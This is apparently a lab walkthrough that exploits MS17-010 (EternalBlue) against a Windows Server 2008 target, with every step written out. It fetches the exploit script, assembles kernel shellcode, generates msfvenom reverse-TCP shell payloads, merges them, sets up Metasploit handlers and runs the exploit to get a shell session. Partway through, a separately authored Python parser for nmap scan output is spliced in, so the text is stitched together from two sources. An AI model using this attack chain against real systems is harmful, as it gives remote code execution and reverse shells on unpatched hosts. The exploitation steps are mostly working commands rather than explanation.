Eternalblue test for Windows Server Standard 2008 SP1 32bit

This is a test of an Eternalblue exploit script from worawit:
https://github.com/worawit/MS17-010/blob/master/eternalblue_exploit7.py

The script claims to have been tested on:
- Windows 7 SP1 x64  
- Windows 2008 R2 SP1 x64  
- Windows 7 SP1 x86  
- Windows 2008 SP1 x64  
- Windows 2008 SP1 x86

Get the main script:
wget https://github.com/worawit/MS17-010/raw/master/eternalblue_exploit7.py

dos2unix eternalblue_exploit7.py

There is some shellcode required that has to be assembled. I downloaded and installed NASM on a Windows VM.

On my Windows 7 32 bit VM I downloaded the kernel shellcode from:
https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_kshellcode_x86.asm

I saved the shellcode into a file called:
sc_x86_kernel.asm

The shellcode needs to be in a raw binary form. I should be able to use NASM with the -f bin option to compile the assembly code to a raw binary file.

C:\Users\nc\AppData\Local\bin\NASM\nasm.exe -f bin sc_x86_kernel.asm -o sc_x86_kernel.bin


I copied this sc_x86_kernel.bin file using Filezilla to my Kali box.

Looking at this file:
https://github.com/worawit/MS17-010/blob/master/shellcode/eternalblue_sc_merge.py

It is my understanding that I need to create some shellcode with msfvenom and then concatenate that onto the end of this kernel shellcode.

Creating the Windows 32 bit shellcode using msfvenom:
msfvenom -p windows/shell/reverse_tcp LPORT=443 LHOST=10.10.77.185 --format raw -o sc_x86_msf.bin EXITFUNC=thread

Concatenating the 2 files:
cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin


On my Windows 7 64 bit VM I downloaded the kernel shellcode file from:
https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_kshellcode_x64.asm

I saved the shellcode into a file called:
sc_x64_kernel.asm

The shellcode needs to be in a raw binary form. I should be able to use NASM with the -f bin option to compile the assembly code to a raw binary file.

C:\exploits\shellcode>C:\Users\nc\AppData\Local\bin\NASM\nasm.exe -f bin sc_x64_kernel.asm -o sc_x64_kernel.bin


I copied this sc_x64_kernel.bin file using Filezilla to my Kali box.

Creating the Windows 64 bit shellcode using msfvenom:
msfvenom -p windows/x64/shell/reverse_tcp LPORT=444 LHOST=10.10.77.185 --format raw -o sc_x64_msf.bin EXITFUNC=thread

Concatenating the 2 files:
cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin


Create the eternalblue_sc_merge.py script with the contents consisting of the first 20 lines from here:
https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_sc_merge.py

Run the script to create the sc_all.bin file:
python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

The last step is to test this against a vulnerable target.

First we need to set up some multi/handlers to catch the potential reverse connections:
service postgresql start
msfconsole -q
use exploit/multi/handler
set ExitOnSession false
setg LHOST 10.10.77.185
set PAYLOAD windows/x64/shell/reverse_tcp
set EXITFUNC thread
set LPORT 444
exploit -j
...
set PAYLOAD windows/shell/reverse_tcp
set LPORT 443
exploit -j


Ensure that our vulnerable target is running. IP address of the target is:
10.10.77.161

An nmap NSE scan result says that the target is vulnerable:
nmap -sS -Pn -n -sV -p 445 --open --min-rate 10 --script smb-vuln-ms17-010 --script-args=unsafe=1 10.10.77.161 -oA "nse_vuln"
...
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
...
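To turn scan output like this into a patch list, here is an added example (my own code, not part of the original post or the worawit repository) that parses the normal-format text nmap writes (the nse_vuln.nmap file from -oA above) for the smb-vuln-ms17-010 result and reports the hosts flagged VULNERABLE. The sample output it reads is constructed in the shape shown above; the second host and its error line are assumed, not taken from a real scan.

```python
import re

# Constructed sample in the shape of the scan output above; not real scan data.
# Host .161 is flagged VULNERABLE, host .162 returns only a negotiation error.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.77.161
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_
Nmap scan report for 10.10.77.162
Host script results:
|_smb-vuln-ms17-010: Could not negotiate a connection: SMB: Failed to receive bytes: ERROR
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
STATE_RE = re.compile(r"^\|\s+State:\s+(\S+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_ms17_010(report):
    """Map each scanned host to the smb-vuln-ms17-010 state and CVE ids nmap printed."""
    hosts = {}
    current, in_script = None, False   # host block we are in / inside its ms17-010 result
    for line in report.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = {"state": "NOT_FLAGGED", "cves": []}
            in_script = False
            continue
        if "smb-vuln-ms17-010" in line:
            in_script = True
        if current is None or not in_script:
            continue
        m = STATE_RE.match(line)
        if m:
            hosts[current]["state"] = m.group(1)
        for cve in CVE_RE.findall(line):
            if cve not in hosts[current]["cves"]:
                hosts[current]["cves"].append(cve)
    return hosts

def hosts_needing_patch(report):
    """Hosts to prioritise for the MS17-010 update or SMBv1 removal."""
    return sorted(h for h, r in parse_ms17_010(report).items() if r["state"] == "VULNERABLE")
```

Point parse_ms17_010 at the contents of nse_vuln.nmap from a real scan to get the same per-host dictionary.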

Run the script to see if we are in business:
python eternalblue_exploit7.py 10.10.77.161 sc_all.bin

We see something happened on the msfconsole:

Press the Enter key to get a prompt.

Run this to interact with the first session (sessions -l to see what sessions are available):
sessions -i 1


Resources:
NASM http://www.nasm.us/
Windows Server 2008 https://www.microsoft.com/en-ca/download/details.aspx?id=5023
Windows 7 download https://www.microsoft.com/en-ca/software-download/windows7
Kali https://www.kali.org/downloads/
